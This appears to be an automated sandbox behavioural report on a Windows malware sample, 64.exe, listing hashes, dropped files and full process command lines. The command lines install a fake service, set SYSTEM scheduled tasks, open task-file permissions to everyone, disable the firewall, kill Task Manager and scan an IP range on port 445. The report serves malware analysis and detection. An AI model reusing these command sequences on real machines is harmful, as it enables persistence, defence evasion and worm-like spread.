Analysis
max time kernel: 151s
max time network: 151s
platform: windows7_x64
resource: win7v20210408
submitted: 07-05-2021 11:09
Static task: static1
Behavioral task: behavioral1
Sample: 64.exe
Resource: win7v20210408
Behavioral task: behavioral2
Sample: 64.exe
Resource: win10v20210410
General
Target: 64.exe
Size: 1.6MB
MD5: 2510bc30669edc05f9aeb06f5c92bed2
SHA1: 3ac2a1e223d74323c18c9d4788ec3195c382dc64
SHA256: 428280c60495d98bb323401c877783e641d21f649684fbacbb29bc8067bf6635
SHA512: 9140358e8b8587b415ef65f0f13005920cf98ea3e98bf984aded7e1a10408b9a7f8bb4bde22de5e698f6ec3bf9d32abca849194e0b1c9daa8cb08961d03bddfb
Malware Config
Signatures
-
Executes dropped EXE 11 IoCs
Processes:
pid  process
2040  dxdiag.exe
1328  svchost.exe
1308  svchost.exe
1860  svchost.exe
1448  svchost.exe
1400  svchost.exe
1492  svchost.exe
1020  svchost.exe
1972  svchost.exe
824  wget.exe
1876  taskhost.exe
-
Stops running service(s) 3 TTPs
-
Processes:
resource  yara_rule
\Windows\Fonts\Ms\wget.exe  upx
C:\Windows\Fonts\Ms\wget.exe  upx
C:\Windows\Fonts\Ms\wget.exe  upx
\Windows\Fonts\Ms\wget.exe  upx
-
Loads dropped DLL 9 IoCs
Processes:
pid  process
1820  64.exe
1820  64.exe
1168  cmd.exe
1168  cmd.exe
1168  cmd.exe
464  cmd.exe
464  cmd.exe
464  cmd.exe
464  cmd.exe
-
Drops file in Windows directory 41 IoCs
Processes:
description  ioc  process
File created  C:\Windows\Fonts\Ms\p.txt  64.exe
File created  C:\Windows\Fonts\Ms\Eter.exe  64.exe
File created  C:\Windows\Fonts\Ms\Eter.dll  64.exe
File created  C:\Windows\Fonts\Ms\any.bat  64.exe
File created  C:\Windows\Fonts\Ms\puls.xml  64.exe
File created  C:\Windows\Fonts\Ms\coli-0.dll  64.exe
File created  C:\Windows\Fonts\Ms\ld.bat  64.exe
File created  C:\Windows\Fonts\Ms\svchost.exe  64.exe
File created  C:\Windows\Fonts\Ms\tich-1.dll  64.exe
File created  C:\Windows\Fonts\Ms\tucl-1.dll  64.exe
File created  C:\Windows\Fonts\Ms\ucl.dll  64.exe
File created  C:\Windows\Fonts\Ms\xdvl-0.dll  64.exe
File created  C:\Windows\Fonts\Ms\neibu.bat  64.exe
File created  C:\Windows\Fonts\Ms\mance.exe  64.exe
File created  C:\Windows\Fonts\Ms\wget.exe  64.exe
File created  C:\Windows\Fonts\Ms\tibe-2.dll  64.exe
File created  C:\Windows\Fonts\Ms\temp.txt  wget.exe
File created  C:\Windows\Fonts\Ms\zlib1.dll  64.exe
File created  C:\Windows\Help\dxdiag.exe  64.exe
File opened for modification  C:\Windows\svchost.exe  dxdiag.exe
File created  C:\Windows\Fonts\Ms\Eter.xml  64.exe
File created  C:\Windows\Fonts\Ms\libeay32.dll  64.exe
File created  C:\Windows\Fonts\Ms\NansHou.dll  64.exe
File created  C:\Windows\Fonts\Ms\tufo-2.dll  64.exe
File created  C:\Windows\Fonts\Ms\libxml2.dll  64.exe
File created  C:\Windows\Fonts\Ms\ssleay32.dll  64.exe
File created  C:\Windows\Fonts\Ms\trch-1.dll  64.exe
File created  C:\Windows\Fonts\Ms\trfo-2.dll  64.exe
File created  C:\Windows\Fonts\Ms\cnli-1.dll  64.exe
File created  C:\Windows\Fonts\Ms\crli-0.dll  64.exe
File created  C:\Windows\Fonts\Ms\Doubl.dll  64.exe
File created  C:\Windows\Fonts\Ms\exma-1.dll  64.exe
File opened for modification  C:\Windows\Fonts\Ms\Result.txt  taskhost.exe
File created  C:\Windows\Fonts\Ms\cm.bat  64.exe
File created  C:\Windows\Fonts\Ms\puls.exe  64.exe
File created  C:\Windows\Fonts\Ms\dmgd-4.dll  64.exe
File created  C:\Windows\svchost.exe  dxdiag.exe
File created  C:\Windows\Fonts\Ms\lb.bat  64.exe
File created  C:\Windows\Fonts\Ms\mance.xml  64.exe
File created  C:\Windows\Fonts\Ms\taskhost.exe  64.exe
File created  C:\Windows\Fonts\Ms\posh-0.dll  64.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid  process
1200  schtasks.exe
1836  schtasks.exe
-
Kills process with taskkill 19 IoCs
Processes:
pid  process
1872  taskkill.exe
1380  taskkill.exe
840  taskkill.exe
300  taskkill.exe
1328  taskkill.exe
1492  taskkill.exe
1636  taskkill.exe
1976  taskkill.exe
1768  taskkill.exe
1976  taskkill.exe
1616  taskkill.exe
1704  taskkill.exe
736  taskkill.exe
568  taskkill.exe
1376  taskkill.exe
2024  taskkill.exe
1676  taskkill.exe
1676  taskkill.exe
1964  taskkill.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 4 IoCs
Processes:
pid  process
1000  PING.EXE
640  PING.EXE
1624  PING.EXE
1028  PING.EXE
-
Suspicious use of AdjustPrivilegeToken 19 IoCs
Processes:
description  pid  process
Token: SeDebugPrivilege  1976  taskkill.exe
Token: SeDebugPrivilege  1872  taskkill.exe
Token: SeDebugPrivilege  300  taskkill.exe
Token: SeDebugPrivilege  1380  taskkill.exe
Token: SeDebugPrivilege  1616  taskkill.exe
Token: SeDebugPrivilege  1704  taskkill.exe
Token: SeDebugPrivilege  1676  taskkill.exe
Token: SeDebugPrivilege  736  taskkill.exe
Token: SeDebugPrivilege  1328  taskkill.exe
Token: SeDebugPrivilege  568  taskkill.exe
Token: SeDebugPrivilege  840  taskkill.exe
Token: SeDebugPrivilege  1492  taskkill.exe
Token: SeDebugPrivilege  1376  taskkill.exe
Token: SeDebugPrivilege  1676  taskkill.exe
Token: SeDebugPrivilege  1636  taskkill.exe
Token: SeDebugPrivilege  1976  taskkill.exe
Token: SeDebugPrivilege  1768  taskkill.exe
Token: SeDebugPrivilege  2024  taskkill.exe
Token: SeDebugPrivilege  1964  taskkill.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid  process
2040  dxdiag.exe
1860  svchost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description  pid  process  target process
PID 1820 wrote to memory of 2040  1820  64.exe  dxdiag.exe
PID 1820 wrote to memory of 2040  1820  64.exe  dxdiag.exe
PID 1820 wrote to memory of 2040  1820  64.exe  dxdiag.exe
PID 1820 wrote to memory of 2040  1820  64.exe  dxdiag.exe
PID 1820 wrote to memory of 1168  1820  64.exe  cmd.exe
PID 1820 wrote to memory of 1168  1820  64.exe  cmd.exe
PID 1820 wrote to memory of 1168  1820  64.exe  cmd.exe
PID 1820 wrote to memory of 1168  1820  64.exe  cmd.exe
PID 1168 wrote to memory of 1328  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1328  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1328  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1328  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1308  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1308  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1308  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1308  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1844  1168  cmd.exe  sc.exe
PID 1168 wrote to memory of 1844  1168  cmd.exe  sc.exe
PID 1168 wrote to memory of 1844  1168  cmd.exe  sc.exe
PID 1168 wrote to memory of 1844  1168  cmd.exe  sc.exe
PID 1168 wrote to memory of 1448  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1448  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1448  1168  cmd.exe  svchost.exe
PID 1168 wrote to memory of 1448  1168  cmd.exe  svchost.exe
PID 1400 wrote to memory of 464  1400  svchost.exe  cmd.exe
PID 1400 wrote to memory of 464  1400  svchost.exe  cmd.exe
PID 1400 wrote to memory of 464  1400  svchost.exe  cmd.exe
PID 1400 wrote to memory of 464  1400  svchost.exe  cmd.exe
PID 464 wrote to memory of 1020  464  cmd.exe  mode.com
PID 464 wrote to memory of 1020  464  cmd.exe  mode.com
PID 464 wrote to memory of 1020  464  cmd.exe  mode.com
PID 464 wrote to memory of 1020  464  cmd.exe  mode.com
PID 464 wrote to memory of 1028  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1028  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1028  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1028  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1156  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1156  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1156  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1156  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1468  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1468  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1468  464  cmd.exe  sc.exe
PID 464 wrote to memory of 1468  464  cmd.exe  sc.exe
PID 464 wrote to memory of 856  464  cmd.exe  sc.exe
PID 464 wrote to memory of 856  464  cmd.exe  sc.exe
PID 464 wrote to memory of 856  464  cmd.exe  sc.exe
PID 464 wrote to memory of 856  464  cmd.exe  sc.exe
PID 464 wrote to memory of 816  464  cmd.exe  net.exe
PID 464 wrote to memory of 816  464  cmd.exe  net.exe
PID 464 wrote to memory of 816  464  cmd.exe  net.exe
PID 464 wrote to memory of 816  464  cmd.exe  net.exe
PID 816 wrote to memory of 384  816  net.exe  net1.exe
PID 816 wrote to memory of 384  816  net.exe  net1.exe
PID 816 wrote to memory of 384  816  net.exe  net1.exe
PID 816 wrote to memory of 384  816  net.exe  net1.exe
PID 464 wrote to memory of 300  464  cmd.exe  net.exe
PID 464 wrote to memory of 300  464  cmd.exe  net.exe
PID 464 wrote to memory of 300  464  cmd.exe  net.exe
PID 464 wrote to memory of 300  464  cmd.exe  net.exe
PID 300 wrote to memory of 1276  300  net.exe  net1.exe
PID 300 wrote to memory of 1276  300  net.exe  net1.exe
PID 300 wrote to memory of 1276  300  net.exe  net1.exe
PID 300 wrote to memory of 1276  300  net.exe  net1.exe
-
Views/modifies file attributes 1 TTPs 6 IoCs
Processes:
pid  process
848  attrib.exe
1448  attrib.exe
1468  attrib.exe
1636  attrib.exe
1448  attrib.exe
1204  attrib.exe
Processes
-
depth 1: C:\Users\Admin\AppData\Local\Temp\64.exe
command line: "C:\Users\Admin\AppData\Local\Temp\64.exe"
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
depth 2: C:\Windows\Help\dxdiag.exe
command line: "C:\Windows\Help\dxdiag.exe"
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
depth 2: C:\Windows\SysWOW64\cmd.exe
command line: cmd /c ""C:\Windows\Fonts\Ms\any.bat" "
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
depth 3: C:\Windows\Fonts\Ms\svchost.exe
command line: svchost install MSSQLD "C:\Windows\Fonts\Ms\cm.bat"
- Executes dropped EXE
-
depth 3: C:\Windows\Fonts\Ms\svchost.exe
command line: svchost install "MSSQLD" C:\Windows\Fonts\Ms\cm.bat
- Executes dropped EXE
-
depth 3: C:\Windows\SysWOW64\sc.exe
command line: sc config "MSSQLD" start= AUTO
-
depth 3: C:\Windows\Fonts\Ms\svchost.exe
command line: svchost start "MSSQLD"
- Executes dropped EXE
-
depth 3: C:\Windows\SysWOW64\net.exe
command line: net start "MSSQLD"
-
depth 4: C:\Windows\SysWOW64\net1.exe
command line: C:\Windows\system32\net1 start "MSSQLD"
-
depth 3: C:\Windows\SysWOW64\net.exe
command line: net stop "MicrosoftMsql"
-
depth 4: C:\Windows\SysWOW64\net1.exe
command line: C:\Windows\system32\net1 stop "MicrosoftMsql"
-
depth 3: C:\Windows\Fonts\Ms\svchost.exe
command line: svchost stop "MicrosoftMsql"
- Executes dropped EXE
-
depth 3: C:\Windows\Fonts\Ms\svchost.exe
command line: svchost remove "MicrosoftMsql" confirm
- Executes dropped EXE
-
depth 3: C:\Windows\SysWOW64\sc.exe
command line: sc delete "MicrosoftMsql"
-
depth 3: C:\Windows\SysWOW64\PING.EXE
command line: ping 127.0.0.1 -n 3
- Runs ping.exe
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\schtasks.exe
command line: schtasks /create /TN "At8" /TR "C:\Windows\Fonts\Ms\neibu.bat" /SC daily /ST 10:40:00 /RU SYSTEM
- Creates scheduled task(s)
-
depth 3: C:\Windows\SysWOW64\attrib.exe
command line: attrib -h -s -r C:\windows\tasks\At*.job
- Views/modifies file attributes
-
depth 3: C:\Windows\SysWOW64\attrib.exe
command line: attrib -h -s -r C:\Windows\System32\Tasks\At*
- Views/modifies file attributes
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\windows\tasks\At6.job /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\windows\tasks\At6.job /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks\At6 /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks\At* /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\windows\tasks\At6.job /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\windows\tasks\At6.job /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks\At6 /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks\At6 /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\net.exe
command line: net start schedule
-
depth 4: C:\Windows\SysWOW64\net1.exe
command line: C:\Windows\system32\net1 start schedule
-
depth 3: C:\Windows\SysWOW64\sc.exe
command line: sc start schedule
-
depth 3: C:\Windows\Fonts\Ms\svchost.exe
command line: svchost start schedule
- Executes dropped EXE
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\schtasks.exe
command line: schtasks /create /TN "At8" /TR "C:\Windows\Fonts\Ms\neibu.bat" /SC daily /ST 10:40:00 /RU SYSTEM
- Creates scheduled task(s)
-
depth 3: C:\Windows\SysWOW64\attrib.exe
command line: attrib -r C:\windows\tasks\At*.job
- Views/modifies file attributes
-
depth 3: C:\Windows\SysWOW64\attrib.exe
command line: attrib -r C:\Windows\System32\Tasks\At*
- Views/modifies file attributes
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\windows\tasks\At8.job /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\windows\tasks\At8.job /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks\At8 /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\System32\Tasks\At8 /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\Fonts\Msql\*.* /c /e /t /g everyone:F
-
depth 3: C:\Windows\SysWOW64\cmd.exe
command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
-
depth 3: C:\Windows\SysWOW64\cacls.exe
command line: cacls C:\Windows\Fonts\Msql\*.* /c /e /t /g system:F
-
depth 3: C:\Windows\SysWOW64\attrib.exe
command line: attrib -h -s -r C:\Windows\Fonts\Msql\*.*
- Views/modifies file attributes
-
depth 3: C:\Windows\SysWOW64\attrib.exe
command line: attrib -h -s -r C:\Windows\Fonts\Msql
- Views/modifies file attributes
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im ss.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im 32.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im c32.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im c64.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im 64.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im service.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im ll.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im ql.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im taskmgr.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 1: C:\Windows\svchost.exe
command line: C:\Windows\svchost.exe
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
depth 1: C:\Windows\Fonts\Ms\svchost.exe
command line: C:\Windows\Fonts\Ms\svchost.exe
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
depth 2: C:\Windows\SysWOW64\cmd.exe
command line: cmd /c ""C:\Windows\Fonts\Ms\cm.bat" "
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
depth 3: C:\Windows\SysWOW64\mode.com
command line: mode con cols=50 lines=40
-
depth 3: C:\Windows\SysWOW64\sc.exe
command line: sc config Browser start= auto
-
depth 3: C:\Windows\SysWOW64\sc.exe
command line: sc config lanmanworkstation start= auto
-
depth 3: C:\Windows\SysWOW64\sc.exe
command line: sc config lanmanserver start= auto
-
depth 3: C:\Windows\SysWOW64\sc.exe
command line: sc config SharedAccess start= disabled
-
depth 3: C:\Windows\SysWOW64\net.exe
command line: net start Browser
- Suspicious use of WriteProcessMemory
-
depth 4: C:\Windows\SysWOW64\net1.exe
command line: C:\Windows\system32\net1 start Browser
-
depth 3: C:\Windows\SysWOW64\net.exe
command line: net start lanmanworkstation
- Suspicious use of WriteProcessMemory
-
depth 4: C:\Windows\SysWOW64\net1.exe
command line: C:\Windows\system32\net1 start lanmanworkstation
-
depth 3: C:\Windows\SysWOW64\net.exe
command line: net start lanmanserver
-
depth 4: C:\Windows\SysWOW64\net1.exe
command line: C:\Windows\system32\net1 start lanmanserver
-
depth 3: C:\Windows\SysWOW64\net.exe
command line: net stop SharedAccess
-
depth 4: C:\Windows\SysWOW64\net1.exe
command line: C:\Windows\system32\net1 stop SharedAccess
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im mance.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im Eter.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im puls.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im mance.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im Eter.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im mance.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im puls.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im puls.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im wget.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\taskkill.exe
command line: taskkill /f /im taskmgr.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
depth 3: C:\Windows\SysWOW64\PING.EXE
command line: ping 127.1 -n 10
- Runs ping.exe
-
depth 3: C:\Windows\Fonts\Ms\wget.exe
command line: wget -t 8 -O temp.txt "http://v4.ipv6-test.com/api/myip.php"
- Executes dropped EXE
- Drops file in Windows directory
-
depth 3: C:\Windows\SysWOW64\PING.EXE
command line: ping 127.1 -n 3
- Runs ping.exe
-
depth 3: C:\Windows\SysWOW64\PING.EXE
command line: ping 127.1 -n 3
- Runs ping.exe
-
depth 3: C:\Windows\Fonts\Ms\taskhost.exe
command line: taskhost.exe tcp 154.61.0.254 154.61.255.254 445 450 /save
- Executes dropped EXE
- Drops file in Windows directory
Network
Downloads